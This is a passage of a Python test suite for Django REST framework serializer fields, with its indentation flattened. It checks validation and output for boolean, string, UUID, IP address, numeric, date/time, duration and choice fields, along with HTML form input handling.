data = {'read_only': 123, 'writable': 456}
serializer = self.Serializer(data=data)
assert serializer.is_valid()
assert serializer.validated_data == {'writable': 456}
def test_serialize_read_only(self):
"""
        Read-only fields should be serialized.
"""
instance = {'read_only': 123, 'writable': 456}
serializer = self.Serializer(instance)
assert serializer.data == {'read_only': 123, 'writable': 456}
class TestWriteOnly:
def setup(self):
class TestSerializer(serializers.Serializer):
write_only = serializers.IntegerField(write_only=True)
readable = serializers.IntegerField()
self.Serializer = TestSerializer
def test_validate_write_only(self):
"""
        Write-only fields should be included in validation.
"""
data = {'write_only': 123, 'readable': 456}
serializer = self.Serializer(data=data)
assert serializer.is_valid()
assert serializer.validated_data == {'write_only': 123, 'readable': 456}
def test_serialize_write_only(self):
"""
        Write-only fields should not be serialized.
"""
instance = {'write_only': 123, 'readable': 456}
serializer = self.Serializer(instance)
assert serializer.data == {'readable': 456}
class TestInitial:
def setup(self):
class TestSerializer(serializers.Serializer):
initial_field = serializers.IntegerField(initial=123)
blank_field = serializers.IntegerField()
self.serializer = TestSerializer()
def test_initial(self):
"""
Initial values should be included when serializing a new representation.
"""
assert self.serializer.data == {
'initial_field': 123,
'blank_field': None
}
class TestInitialWithCallable:
def setup(self):
def initial_value():
return 123
class TestSerializer(serializers.Serializer):
initial_field = serializers.IntegerField(initial=initial_value)
self.serializer = TestSerializer()
def test_initial_should_accept_callable(self):
"""
Follows the default ``Field.initial`` behaviour where they accept a
callable to produce the initial value"""
assert self.serializer.data == {
'initial_field': 123,
}
class TestLabel:
def setup(self):
class TestSerializer(serializers.Serializer):
labeled = serializers.IntegerField(label='My label')
self.serializer = TestSerializer()
def test_label(self):
"""
A field's label may be set with the `label` argument.
"""
fields = self.serializer.fields
assert fields['labeled'].label == 'My label'
class TestInvalidErrorKey:
def setup(self):
class ExampleField(serializers.Field):
def to_native(self, data):
self.fail('incorrect')
self.field = ExampleField()
def test_invalid_error_key(self):
"""
If a field raises a validation error, but does not have a corresponding
error message, then raise an appropriate assertion error.
"""
with pytest.raises(AssertionError) as exc_info:
self.field.to_native(123)
expected = (
'ValidationError raised by `ExampleField`, but error key '
'`incorrect` does not exist in the `error_messages` dictionary.'
)
assert str(exc_info.value) == expected
class TestBooleanHTMLInput:
def test_empty_html_checkbox(self):
"""
HTML checkboxes do not send any value, but should be treated
as `False` by BooleanField.
"""
class TestSerializer(serializers.Serializer):
archived = serializers.BooleanField()
serializer = TestSerializer(data=QueryDict(''))
assert serializer.is_valid()
assert serializer.validated_data == {'archived': False}
def test_empty_html_checkbox_not_required(self):
"""
HTML checkboxes do not send any value, but should be treated
as `False` by BooleanField, even if the field is required=False.
"""
class TestSerializer(serializers.Serializer):
archived = serializers.BooleanField(required=False)
serializer = TestSerializer(data=QueryDict(''))
assert serializer.is_valid()
assert serializer.validated_data == {'archived': False}
class TestHTMLInput:
def test_empty_html_charfield_with_default(self):
class TestSerializer(serializers.Serializer):
message = serializers.CharField(default='happy')
serializer = TestSerializer(data=QueryDict(''))
assert serializer.is_valid()
assert serializer.validated_data == {'message': 'happy'}
def test_empty_html_charfield_without_default(self):
class TestSerializer(serializers.Serializer):
message = serializers.CharField(allow_blank=True)
serializer = TestSerializer(data=QueryDict('message='))
assert serializer.is_valid()
assert serializer.validated_data == {'message': ''}
def test_empty_html_charfield_without_default_not_required(self):
class TestSerializer(serializers.Serializer):
message = serializers.CharField(allow_blank=True, required=False)
serializer = TestSerializer(data=QueryDict('message='))
assert serializer.is_valid()
assert serializer.validated_data == {'message': ''}
def test_empty_html_integerfield(self):
class TestSerializer(serializers.Serializer):
message = serializers.IntegerField(default=123)
serializer = TestSerializer(data=QueryDict('message='))
assert serializer.is_valid()
assert serializer.validated_data == {'message': 123}
def test_empty_html_uuidfield_with_default(self):
class TestSerializer(serializers.Serializer):
message = serializers.UUIDField(default=uuid.uuid4)
serializer = TestSerializer(data=QueryDict('message='))
assert serializer.is_valid()
assert list(serializer.validated_data.keys()) == ['message']
def test_empty_html_uuidfield_with_optional(self):
class TestSerializer(serializers.Serializer):
message = serializers.UUIDField(required=False)
serializer = TestSerializer(data=QueryDict('message='))
assert serializer.is_valid()
assert list(serializer.validated_data.keys()) == []
def test_empty_html_charfield_allow_null(self):
class TestSerializer(serializers.Serializer):
message = serializers.CharField(allow_null=True)
serializer = TestSerializer(data=QueryDict('message='))
assert serializer.is_valid()
assert serializer.validated_data == {'message': None}
def test_empty_html_datefield_allow_null(self):
class TestSerializer(serializers.Serializer):
expiry = serializers.DateField(allow_null=True)
serializer = TestSerializer(data=QueryDict('expiry='))
assert serializer.is_valid()
assert serializer.validated_data == {'expiry': None}
def test_empty_html_charfield_allow_null_allow_blank(self):
class TestSerializer(serializers.Serializer):
message = serializers.CharField(allow_null=True, allow_blank=True)
serializer = TestSerializer(data=QueryDict('message='))
assert serializer.is_valid()
assert serializer.validated_data == {'message': ''}
def test_empty_html_charfield_required_false(self):
class TestSerializer(serializers.Serializer):
message = serializers.CharField(required=False)
serializer = TestSerializer(data=QueryDict(''))
assert serializer.is_valid()
assert serializer.validated_data == {}
def test_querydict_list_input(self):
class TestSerializer(serializers.Serializer):
scores = serializers.ListField(child=serializers.IntegerField())
serializer = TestSerializer(data=QueryDict('scores=1&scores=3'))
assert serializer.is_valid()
assert serializer.validated_data == {'scores': [1, 3]}
def test_querydict_list_input_only_one_input(self):
class TestSerializer(serializers.Serializer):
scores = serializers.ListField(child=serializers.IntegerField())
serializer = TestSerializer(data=QueryDict('scores=1&'))
assert serializer.is_valid()
assert serializer.validated_data == {'scores': [1]}
class TestCreateOnlyDefault:
def setup(self):
default = serializers.CreateOnlyDefault('2001-01-01')
class TestSerializer(serializers.Serializer):
published = serializers.HiddenField(default=default)
text = serializers.CharField()
self.Serializer = TestSerializer
def test_create_only_default_is_provided(self):
serializer = self.Serializer(data={'text': 'example'})
assert serializer.is_valid()
assert serializer.validated_data == {
'text': 'example', 'published': '2001-01-01'
}
def test_create_only_default_is_not_provided_on_update(self):
instance = {
'text': 'example', 'published': '2001-01-01'
}
serializer = self.Serializer(instance, data={'text': 'example'})
assert serializer.is_valid()
assert serializer.validated_data == {
'text': 'example',
}
def test_create_only_default_callable_sets_context(self):
"""
CreateOnlyDefault instances with a callable default should set_context
on the callable if possible
"""
class TestCallableDefault:
def set_context(self, serializer_field):
self.field = serializer_field
def __call__(self):
return "success" if hasattr(self, 'field') else "failure"
class TestSerializer(serializers.Serializer):
context_set = serializers.CharField(default=serializers.CreateOnlyDefault(TestCallableDefault()))
serializer = TestSerializer(data={})
assert serializer.is_valid()
assert serializer.validated_data['context_set'] == 'success'
# Tests for field input and output values.
# ----------------------------------------
def get_items(mapping_or_list_of_two_tuples):
# Tests accept either lists of two tuples, or dictionaries.
if isinstance(mapping_or_list_of_two_tuples, dict):
# {value: expected}
return mapping_or_list_of_two_tuples.items()
# [(value, expected), ...]
return mapping_or_list_of_two_tuples
class FieldValues:
"""
Base class for testing valid and invalid input values.
"""
def test_valid_inputs(self):
"""
Ensure that valid values return the expected validated data.
"""
for input_value, expected_output in get_items(self.valid_inputs):
assert self.field.run_validation(input_value) == expected_output
def test_invalid_inputs(self):
"""
Ensure that invalid values raise the expected validation error.
"""
for input_value, expected_failure in get_items(self.invalid_inputs):
with pytest.raises(serializers.ValidationError) as exc_info:
self.field.run_validation(input_value)
assert exc_info.value.detail == expected_failure
def test_outputs(self):
for output_value, expected_output in get_items(self.outputs):
assert self.field.to_representation(output_value) == expected_output
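# Illustrative FieldValues subclass (a sketch mirroring the concrete classes
# below; the exact error message is an assumption, not asserted here):
#
# class TestExampleField(FieldValues):
#     valid_inputs = {'1': 1}                # input -> validated value
#     invalid_inputs = {'x': ['A valid integer is required.']}
#     outputs = {1: 1}                       # internal value -> representation
#     field = serializers.IntegerField()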
# Boolean types...
class TestBooleanField(FieldValues):
"""
Valid and invalid values for `BooleanField`.
"""
valid_inputs = {
'true': True,
'false': False,
'1': True,
'0': False,
1: True,
0: False,
True: True,
False: False,
}
invalid_inputs = {
'foo': ['"foo" is not a valid boolean.'],
None: ['This field may not be null.']
}
outputs = {
'true': True,
'false': False,
'1': True,
'0': False,
1: True,
0: False,
True: True,
False: False,
'other': True
}
field = serializers.BooleanField()
def test_disallow_unhashable_collection_types(self):
inputs = (
[],
{},
)
field = serializers.BooleanField()
for input_value in inputs:
with pytest.raises(serializers.ValidationError) as exc_info:
field.run_validation(input_value)
expected = ['"{0}" is not a valid boolean.'.format(input_value)]
assert exc_info.value.detail == expected
class TestNullBooleanField(FieldValues):
"""
Valid and invalid values for `BooleanField`.
"""
valid_inputs = {
'true': True,
'false': False,
'null': None,
True: True,
False: False,
None: None
}
invalid_inputs = {
'foo': ['"foo" is not a valid boolean.'],
}
outputs = {
'true': True,
'false': False,
'null': None,
True: True,
False: False,
None: None,
'other': True
}
field = serializers.NullBooleanField()
# String types...
class TestCharField(FieldValues):
"""
Valid and invalid values for `CharField`.
"""
valid_inputs = {
1: '1',
'abc': 'abc'
}
invalid_inputs = {
(): ['Not a valid string.'],
True: ['Not a valid string.'],
'': ['This field may not be blank.']
}
outputs = {
1: '1',
'abc': 'abc'
}
field = serializers.CharField()
def test_trim_whitespace_default(self):
field = serializers.CharField()
assert field.to_internal_value(' abc ') == 'abc'
def test_trim_whitespace_disabled(self):
field = serializers.CharField(trim_whitespace=False)
assert field.to_internal_value(' abc ') == ' abc '
def test_disallow_blank_with_trim_whitespace(self):
field = serializers.CharField(allow_blank=False, trim_whitespace=True)
with pytest.raises(serializers.ValidationError) as exc_info:
field.run_validation(' ')
assert exc_info.value.detail == ['This field may not be blank.']
class TestEmailField(FieldValues):
"""
Valid and invalid values for `EmailField`.
"""
valid_inputs = {
'[email protected]': '[email protected]',
' [email protected] ': '[email protected]',
}
invalid_inputs = {
'examplecom': ['Enter a valid email address.']
}
outputs = {}
field = serializers.EmailField()
class TestRegexField(FieldValues):
"""
Valid and invalid values for `RegexField`.
"""
valid_inputs = {
'a9': 'a9',
}
invalid_inputs = {
'A9': ["This value does not match the required pattern."]
}
outputs = {}
field = serializers.RegexField(regex='[a-z][0-9]')
class TestSlugField(FieldValues):
"""
Valid and invalid values for `SlugField`.
"""
valid_inputs = {
'slug-99': 'slug-99',
}
invalid_inputs = {
'slug 99': ['Enter a valid "slug" consisting of letters, numbers, underscores or hyphens.']
}
outputs = {}
field = serializers.SlugField()
class TestURLField(FieldValues):
"""
Valid and invalid values for `URLField`.
"""
valid_inputs = {
'http://example.com': 'http://example.com',
}
invalid_inputs = {
'example.com': ['Enter a valid URL.']
}
outputs = {}
field = serializers.URLField()
class TestUUIDField(FieldValues):
"""
Valid and invalid values for `UUIDField`.
"""
valid_inputs = {
'825d7aeb-05a9-45b5-a5b7-05df87923cda': uuid.UUID('825d7aeb-05a9-45b5-a5b7-05df87923cda'),
'825d7aeb05a945b5a5b705df87923cda': uuid.UUID('825d7aeb-05a9-45b5-a5b7-05df87923cda'),
'urn:uuid:213b7d9b-244f-410d-828c-dabce7a2615d': uuid.UUID('213b7d9b-244f-410d-828c-dabce7a2615d'),
284758210125106368185219588917561929842: uuid.UUID('d63a6fb6-88d5-40c7-a91c-9edf73283072')
}
invalid_inputs = {
'825d7aeb-05a9-45b5-a5b7': ['"825d7aeb-05a9-45b5-a5b7" is not a valid UUID.'],
(1, 2, 3): ['"(1, 2, 3)" is not a valid UUID.']
}
outputs = {
uuid.UUID('825d7aeb-05a9-45b5-a5b7-05df87923cda'): '825d7aeb-05a9-45b5-a5b7-05df87923cda'
}
field = serializers.UUIDField()
def _test_format(self, uuid_format, formatted_uuid_0):
field = serializers.UUIDField(format=uuid_format)
assert field.to_representation(uuid.UUID(int=0)) == formatted_uuid_0
assert field.to_internal_value(formatted_uuid_0) == uuid.UUID(int=0)
def test_formats(self):
self._test_format('int', 0)
self._test_format('hex_verbose', '00000000-0000-0000-0000-000000000000')
self._test_format('urn', 'urn:uuid:00000000-0000-0000-0000-000000000000')
self._test_format('hex', '0' * 32)
class TestIPAddressField(FieldValues):
"""
    Valid and invalid values for `IPAddressField`.
"""
valid_inputs = {
'127.0.0.1': '127.0.0.1',
'192.168.33.255': '192.168.33.255',
'2001:0db8:85a3:0042:1000:8a2e:0370:7334': '2001:db8:85a3:42:1000:8a2e:370:7334',
'2001:cdba:0:0:0:0:3257:9652': '2001:cdba::3257:9652',
'2001:cdba::3257:9652': '2001:cdba::3257:9652'
}
invalid_inputs = {
'127001': ['Enter a valid IPv4 or IPv6 address.'],
'127.122.111.2231': ['Enter a valid IPv4 or IPv6 address.'],
'2001:::9652': ['Enter a valid IPv4 or IPv6 address.'],
'2001:0db8:85a3:0042:1000:8a2e:0370:73341': ['Enter a valid IPv4 or IPv6 address.'],
1000: ['Enter a valid IPv4 or IPv6 address.'],
}
outputs = {}
field = serializers.IPAddressField()
class TestIPv4AddressField(FieldValues):
"""
    Valid and invalid values for `IPAddressField` with `protocol='IPv4'`.
"""
valid_inputs = {
'127.0.0.1': '127.0.0.1',
'192.168.33.255': '192.168.33.255',
}
invalid_inputs = {
'127001': ['Enter a valid IPv4 address.'],
'127.122.111.2231': ['Enter a valid IPv4 address.'],
}
outputs = {}
field = serializers.IPAddressField(protocol='IPv4')
class TestIPv6AddressField(FieldValues):
"""
    Valid and invalid values for `IPAddressField` with `protocol='IPv6'`.
"""
valid_inputs = {
'2001:0db8:85a3:0042:1000:8a2e:0370:7334': '2001:db8:85a3:42:1000:8a2e:370:7334',
'2001:cdba:0:0:0:0:3257:9652': '2001:cdba::3257:9652',
'2001:cdba::3257:9652': '2001:cdba::3257:9652'
}
invalid_inputs = {
'2001:::9652': ['Enter a valid IPv4 or IPv6 address.'],
'2001:0db8:85a3:0042:1000:8a2e:0370:73341': ['Enter a valid IPv4 or IPv6 address.'],
}
outputs = {}
field = serializers.IPAddressField(protocol='IPv6')
class TestFilePathField(FieldValues):
"""
    Valid and invalid values for `FilePathField`.
"""
valid_inputs = {
__file__: __file__,
}
invalid_inputs = {
'wrong_path': ['"wrong_path" is not a valid path choice.']
}
outputs = {
}
field = serializers.FilePathField(
path=os.path.abspath(os.path.dirname(__file__))
)
# Number types...
class TestIntegerField(FieldValues):
"""
Valid and invalid values for `IntegerField`.
"""
valid_inputs = {
'1': 1,
'0': 0,
1: 1,
0: 0,
1.0: 1,
0.0: 0,
'1.0': 1
}
invalid_inputs = {
0.5: ['A valid integer is required.'],
'abc': ['A valid integer is required.'],
'0.5': ['A valid integer is required.']
}
outputs = {
'1': 1,
'0': 0,
1: 1,
0: 0,
1.0: 1,
0.0: 0
}
field = serializers.IntegerField()
class TestMinMaxIntegerField(FieldValues):
"""
Valid and invalid values for `IntegerField` with min and max limits.
"""
valid_inputs = {
'1': 1,
'3': 3,
1: 1,
3: 3,
}
invalid_inputs = {
0: ['Ensure this value is greater than or equal to 1.'],
4: ['Ensure this value is less than or equal to 3.'],
'0': ['Ensure this value is greater than or equal to 1.'],
'4': ['Ensure this value is less than or equal to 3.'],
}
outputs = {}
field = serializers.IntegerField(min_value=1, max_value=3)
class TestFloatField(FieldValues):
"""
Valid and invalid values for `FloatField`.
"""
valid_inputs = {
'1': 1.0,
'0': 0.0,
1: 1.0,
0: 0.0,
1.0: 1.0,
0.0: 0.0,
}
invalid_inputs = {
'abc': ["A valid number is required."]
}
outputs = {
'1': 1.0,
'0': 0.0,
1: 1.0,
0: 0.0,
1.0: 1.0,
0.0: 0.0,
}
field = serializers.FloatField()
class TestMinMaxFloatField(FieldValues):
"""
Valid and invalid values for `FloatField` with min and max limits.
"""
valid_inputs = {
'1': 1,
'3': 3,
1: 1,
3: 3,
1.0: 1.0,
3.0: 3.0,
}
invalid_inputs = {
0.9: ['Ensure this value is greater than or equal to 1.'],
3.1: ['Ensure this value is less than or equal to 3.'],
'0.0': ['Ensure this value is greater than or equal to 1.'],
'3.1': ['Ensure this value is less than or equal to 3.'],
}
outputs = {}
field = serializers.FloatField(min_value=1, max_value=3)
class TestDecimalField(FieldValues):
"""
Valid and invalid values for `DecimalField`.
"""
valid_inputs = {
'12.3': Decimal('12.3'),
'0.1': Decimal('0.1'),
10: Decimal('10'),
0: Decimal('0'),
12.3: Decimal('12.3'),
0.1: Decimal('0.1'),
'2E+1': Decimal('20'),
}
invalid_inputs = (
('abc', ["A valid number is required."]),
(Decimal('Nan'), ["A valid number is required."]),
(Decimal('Inf'), ["A valid number is required."]),
('12.345', ["Ensure that there are no more than 3 digits in total."]),
(200000000000.0, ["Ensure that there are no more than 3 digits in total."]),
('0.01', ["Ensure that there are no more than 1 decimal places."]),
(123, ["Ensure that there are no more than 2 digits before the decimal point."]),
('2E+2', ["Ensure that there are no more than 2 digits before the decimal point."])
)
outputs = {
'1': '1.0',
'0': '0.0',
'1.09': '1.1',
'0.04': '0.0',
1: '1.0',
0: '0.0',
Decimal('1.0'): '1.0',
Decimal('0.0'): '0.0',
Decimal('1.09'): '1.1',
Decimal('0.04'): '0.0'
}
field = serializers.DecimalField(max_digits=3, decimal_places=1)
class TestMinMaxDecimalField(FieldValues):
"""
Valid and invalid values for `DecimalField` with min and max limits.
"""
valid_inputs = {
'10.0': Decimal('10.0'),
'20.0': Decimal('20.0'),
}
invalid_inputs = {
'9.9': ['Ensure this value is greater than or equal to 10.'],
'20.1': ['Ensure this value is less than or equal to 20.'],
}
outputs = {}
field = serializers.DecimalField(
max_digits=3, decimal_places=1,
min_value=10, max_value=20
)
class TestNoMaxDigitsDecimalField(FieldValues):
field = serializers.DecimalField(
max_value=100, min_value=0,
decimal_places=2, max_digits=None
)
valid_inputs = {
'10': Decimal('10.00')
}
invalid_inputs = {}
outputs = {}
class TestNoStringCoercionDecimalField(FieldValues):
"""
Output values for `DecimalField` with `coerce_to_string=False`.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
1.09: Decimal('1.1'),
0.04: Decimal('0.0'),
'1.09': Decimal('1.1'),
'0.04': Decimal('0.0'),
Decimal('1.09'): Decimal('1.1'),
Decimal('0.04'): Decimal('0.0'),
}
field = serializers.DecimalField(
max_digits=3, decimal_places=1,
coerce_to_string=False
)
class TestLocalizedDecimalField(TestCase):
@override_settings(USE_L10N=True, LANGUAGE_CODE='pl')
def test_to_internal_value(self):
field = serializers.DecimalField(max_digits=2, decimal_places=1, localize=True)
self.assertEqual(field.to_internal_value('1,1'), Decimal('1.1'))
@override_settings(USE_L10N=True, LANGUAGE_CODE='pl')
def test_to_representation(self):
field = serializers.DecimalField(max_digits=2, decimal_places=1, localize=True)
self.assertEqual(field.to_representation(Decimal('1.1')), '1,1')
def test_localize_forces_coerce_to_string(self):
field = serializers.DecimalField(max_digits=2, decimal_places=1, coerce_to_string=False, localize=True)
self.assertTrue(isinstance(field.to_representation(Decimal('1.1')), six.string_types))
class TestQuantizedValueForDecimal(TestCase):
def test_int_quantized_value_for_decimal(self):
field = serializers.DecimalField(max_digits=4, decimal_places=2)
value = field.to_internal_value(12).as_tuple()
expected_digit_tuple = (0, (1, 2, 0, 0), -2)
self.assertEqual(value, expected_digit_tuple)
def test_string_quantized_value_for_decimal(self):
field = serializers.DecimalField(max_digits=4, decimal_places=2)
value = field.to_internal_value('12').as_tuple()
expected_digit_tuple = (0, (1, 2, 0, 0), -2)
self.assertEqual(value, expected_digit_tuple)
def test_part_precision_string_quantized_value_for_decimal(self):
field = serializers.DecimalField(max_digits=4, decimal_places=2)
value = field.to_internal_value('12.0').as_tuple()
expected_digit_tuple = (0, (1, 2, 0, 0), -2)
self.assertEqual(value, expected_digit_tuple)
class TestNoDecimalPlaces(FieldValues):
valid_inputs = {
'0.12345': Decimal('0.12345'),
}
invalid_inputs = {
'0.1234567': ['Ensure that there are no more than 6 digits in total.']
}
outputs = {
'1.2345': '1.2345',
'0': '0',
'1.1': '1.1',
}
field = serializers.DecimalField(max_digits=6, decimal_places=None)
# Date & time serializers...
class TestDateField(FieldValues):
"""
Valid and invalid values for `DateField`.
"""
valid_inputs = {
'2001-01-01': datetime.date(2001, 1, 1),
datetime.date(2001, 1, 1): datetime.date(2001, 1, 1),
}
invalid_inputs = {
'abc': ['Date has wrong format. Use one of these formats instead: YYYY[-MM[-DD]].'],
'2001-99-99': ['Date has wrong format. Use one of these formats instead: YYYY[-MM[-DD]].'],
datetime.datetime(2001, 1, 1, 12, 00): ['Expected a date but got a datetime.'],
}
outputs = {
datetime.date(2001, 1, 1): '2001-01-01',
'2001-01-01': '2001-01-01',
six.text_type('2016-01-10'): '2016-01-10',
None: None,
'': None,
}
field = serializers.DateField()
class TestCustomInputFormatDateField(FieldValues):
"""
Valid and invalid values for `DateField` with a custom input format.
"""
valid_inputs = {
'1 Jan 2001': datetime.date(2001, 1, 1),
}
invalid_inputs = {
'2001-01-01': ['Date has wrong format. Use one of these formats instead: DD [Jan-Dec] YYYY.']
}
outputs = {}
field = serializers.DateField(input_formats=['%d %b %Y'])
class TestCustomOutputFormatDateField(FieldValues):
"""
Values for `DateField` with a custom output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.date(2001, 1, 1): '01 Jan 2001'
}
field = serializers.DateField(format='%d %b %Y')
class TestNoOutputFormatDateField(FieldValues):
"""
Values for `DateField` with no output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.date(2001, 1, 1): datetime.date(2001, 1, 1)
}
field = serializers.DateField(format=None)
class TestDateTimeField(FieldValues):
"""
Valid and invalid values for `DateTimeField`.
"""
valid_inputs = {
'2001-01-01 13:00': datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
'2001-01-01T13:00': datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
'2001-01-01T13:00Z': datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
datetime.datetime(2001, 1, 1, 13, 00): datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()): datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
}
invalid_inputs = {
'abc': ['Datetime has wrong format. Use one of these formats instead: YYYY-MM-DDThh:mm[:ss[.uuuuuu]][+HH:MM|-HH:MM|Z].'],
'2001-99-99T99:00': ['Datetime has wrong format. Use one of these formats instead: YYYY-MM-DDThh:mm[:ss[.uuuuuu]][+HH:MM|-HH:MM|Z].'],
datetime.date(2001, 1, 1): ['Expected a datetime but got a date.'],
}
outputs = {
datetime.datetime(2001, 1, 1, 13, 00): '2001-01-01T13:00:00',
datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()): '2001-01-01T13:00:00Z',
'2001-01-01T00:00:00': '2001-01-01T00:00:00',
six.text_type('2016-01-10T00:00:00'): '2016-01-10T00:00:00',
None: None,
'': None,
}
field = serializers.DateTimeField(default_timezone=timezone.UTC())
class TestCustomInputFormatDateTimeField(FieldValues):
"""
Valid and invalid values for `DateTimeField` with a custom input format.
"""
valid_inputs = {
'1:35pm, 1 Jan 2001': datetime.datetime(2001, 1, 1, 13, 35, tzinfo=timezone.UTC()),
}
invalid_inputs = {
'2001-01-01T20:50': ['Datetime has wrong format. Use one of these formats instead: hh:mm[AM|PM], DD [Jan-Dec] YYYY.']
}
outputs = {}
field = serializers.DateTimeField(default_timezone=timezone.UTC(), input_formats=['%I:%M%p, %d %b %Y'])
class TestCustomOutputFormatDateTimeField(FieldValues):
"""
Values for `DateTimeField` with a custom output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.datetime(2001, 1, 1, 13, 00): '01:00PM, 01 Jan 2001',
}
field = serializers.DateTimeField(format='%I:%M%p, %d %b %Y')
class TestNoOutputFormatDateTimeField(FieldValues):
"""
Values for `DateTimeField` with no output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.datetime(2001, 1, 1, 13, 00): datetime.datetime(2001, 1, 1, 13, 00),
}
field = serializers.DateTimeField(format=None)
class TestNaiveDateTimeField(FieldValues):
"""
Valid and invalid values for `DateTimeField` with naive datetimes.
"""
valid_inputs = {
datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()): datetime.datetime(2001, 1, 1, 13, 00),
'2001-01-01 13:00': datetime.datetime(2001, 1, 1, 13, 00),
}
invalid_inputs = {}
outputs = {}
field = serializers.DateTimeField(default_timezone=None)
class TestTimeField(FieldValues):
"""
Valid and invalid values for `TimeField`.
"""
valid_inputs = {
'13:00': datetime.time(13, 00),
datetime.time(13, 00): datetime.time(13, 00),
}
invalid_inputs = {
'abc': ['Time has wrong format. Use one of these formats instead: hh:mm[:ss[.uuuuuu]].'],
'99:99': ['Time has wrong format. Use one of these formats instead: hh:mm[:ss[.uuuuuu]].'],
}
outputs = {
datetime.time(13, 0): '13:00:00',
datetime.time(0, 0): '00:00:00',
'00:00:00': '00:00:00',
None: None,
'': None,
}
field = serializers.TimeField()
class TestCustomInputFormatTimeField(FieldValues):
"""
Valid and invalid values for `TimeField` with a custom input format.
"""
valid_inputs = {
'1:00pm': datetime.time(13, 00),
}
invalid_inputs = {
'13:00': ['Time has wrong format. Use one of these formats instead: hh:mm[AM|PM].'],
}
outputs = {}
field = serializers.TimeField(input_formats=['%I:%M%p'])
class TestCustomOutputFormatTimeField(FieldValues):
"""
Values for `TimeField` with a custom output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.time(13, 00): '01:00PM'
}
field = serializers.TimeField(format='%I:%M%p')
class TestNoOutputFormatTimeField(FieldValues):
"""
    Values for `TimeField` with no output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.time(13, 00): datetime.time(13, 00)
}
field = serializers.TimeField(format=None)
class TestDurationField(FieldValues):
"""
Valid and invalid values for `DurationField`.
"""
valid_inputs = {
'13': datetime.timedelta(seconds=13),
'3 08:32:01.000123': datetime.timedelta(days=3, hours=8, minutes=32, seconds=1, microseconds=123),
'08:01': datetime.timedelta(minutes=8, seconds=1),
datetime.timedelta(days=3, hours=8, minutes=32, seconds=1, microseconds=123): datetime.timedelta(days=3, hours=8, minutes=32, seconds=1, microseconds=123),
3600: datetime.timedelta(hours=1),
}
invalid_inputs = {
'abc': ['Duration has wrong format. Use one of these formats instead: [DD] [HH:[MM:]]ss[.uuuuuu].'],
'3 08:32 01.123': ['Duration has wrong format. Use one of these formats instead: [DD] [HH:[MM:]]ss[.uuuuuu].'],
}
outputs = {
datetime.timedelta(days=3, hours=8, minutes=32, seconds=1, microseconds=123): '3 08:32:01.000123',
}
field = serializers.DurationField()
# Choice types...
class TestChoiceField(FieldValues):
"""
Valid and invalid values for `ChoiceField`.
"""
valid_inputs = {
'poor': 'poor',
'medium': 'medium',
'good': 'good',
}
invalid_inputs = {
'amazing': ['"amazing" is not a valid choice.']
}
outputs = {
'good': 'good',
'': '',
'amazing': 'amazing',
}
field = serializers.ChoiceField(
choices=[
('poor', 'Poor quality'),
('medium', 'Medium quality'),
('good', 'Good quality'),
]
)
def test_allow_blank(self):
"""
If `allow_blank=True` then '' is a valid input.
"""
field = serializers.ChoiceField(
allow_blank=True,
choices=[
('poor', 'Poor quality'),
('medium', 'Medium quality'),
('good', 'Good quality'),
]
)
output = field.run_validation('')
assert output == ''
def test_allow_null(self):
"""
If `allow_null=True` then '' on HTML forms is treated as None.
"""
field = serializers.ChoiceField(
allow_null=True,
choices=[
1, 2, 3
]
)
field.field_name = 'example'
value = field.get_value(QueryDict('example='))
assert value is None
output = field.run_validation(None)
assert output is None
def test_iter_options(self):
"""
iter_options() should return a list of options and option groups.
"""
field = serializers.ChoiceField(
choices=[
('Numbers', ['integer', 'float']),
('Strings', ['text', 'email', 'url']),
'boolean'
]
)
items = list(field.iter_options())
assert items[0].start_option_group
assert items[0].label == 'Numbers'
assert items[1].value == 'integer'
assert items[2].value == 'float'
assert items[3].end_option_group
assert items[4].start_option_group
assert items[4].label == 'Strings'
assert items[5].value == 'text'
assert items[6].value == 'email'
assert items[7].value == 'url'
assert items[8].end_option_group
assert items[9].value == 'boolean'
class TestChoiceFieldWithType(FieldValues):
"""
    Valid and invalid values for a `ChoiceField` that uses an integer type
    instead of a char type.
"""
valid_inputs = {
'1': 1,
3: 3,
}
invalid_inputs = {
5: ['"5" is not a valid choice.'],
'abc': ['"abc" is not a valid choice.']
}
outputs = {
'1': 1,
1: 1
}
field = serializers.ChoiceField(
choices=[
(1, 'Poor quality'),
(2, 'Medium quality'),
(3, 'Good quality'),
]
)
class TestChoiceFieldWithListChoices(FieldValues):
"""
    Valid and invalid values for a `ChoiceField` that uses a flat list for
    the choices, rather than a list of pairs of (`value`, `description`).
"""
valid_inputs = {
'poor': 'poor',
'medium': 'medium',
'good': 'good',
}
invalid_inputs = {
'awful': ['"awful" is not a valid choice.']
}
outputs = {
'good': 'good'
}
field = serializers.ChoiceField(choices=('poor', 'medium', 'good'))
class TestChoiceFieldWithGroupedChoices(FieldValues):
"""
    Valid and invalid values for a `ChoiceField` that uses a grouped list
    for the choices, rather than a list of pairs of (`value`, `description`).
"""
valid_inputs = {
'poor': 'poor',
'medium': 'medium',
'good': 'good',
}
invalid_inputs = {
'awful': ['"awful" is not a valid choice.']
}
outputs = {
'good': 'good'
}
field = serializers.ChoiceField(
choices=[
(
'Category',
(
('poor', 'Poor quality'),
('medium', 'Medium quality'),
),
),
('good', 'Good quality'),
]
)
class TestChoiceFieldWithMixedChoices(FieldValues):
"""
    Valid and invalid values for a `ChoiceField` that mixes single values,
    paired choices and grouped choices.
"""
valid_inputs = {
'poor': 'poor',
'medium': 'medium',
'good': 'good',
}
invalid_inputs = {
'awful': ['"awful" is not a valid choice.']
}
outputs = {
'good': 'good'
}
field = serializers.ChoiceField(
choices=[
(
'Category',
(
('poor', 'Poor quality'),
),
),
